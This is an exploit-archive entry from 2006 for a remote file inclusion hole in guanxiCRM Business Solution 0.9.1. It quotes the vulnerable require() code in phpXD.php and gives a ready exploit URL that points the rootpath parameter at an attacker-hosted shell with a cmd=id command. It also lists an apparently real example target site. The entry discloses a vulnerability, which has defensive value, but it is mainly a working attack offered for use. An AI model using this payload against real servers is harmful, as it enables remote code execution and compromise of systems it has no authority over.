guanxiCRM Business Solution <= 0.9.1 Remote File Include Vulnerability

2006-09-16T00:00:00
ID 1337DAY-ID-846
Type zdt
Reporter SHiKaA
Modified 2006-09-16T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
guanxiCRM Business Solution <= 0.9.1 Remote File Include Vulnerability
======================================================================



#==============================================================================================
#guanxiCRM <= v0.9.1 (rootpath) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://sourceforge.net/projects/guanxicrm/      
#                                                                      
#Version : v0.9.1                                            
#                                                        
#================================================================================================
#
#Example : http://www.nu3d.com/crm
#
#================================================================================================
#Bug in : include/phpxd/phpXD.php
#
#Vlu Code :
#--------------------------------
#     $path = $appconf["rootpath"]. "/include/phpxd/";
#
#     require($path."include/dom.php");
#     require($path."include/dtd.php");
#     require($path."include/parser.php");
#     ?>
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/include/phpxd/phpXD.php?appconf[rootpath]=http://SHELLURL.COM?&cmd=id
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Special Thx To : Str0ke & simoo & XoRoN & Saudi Hackerz
==================================================================================================



#  0day.today [2018-01-02]  #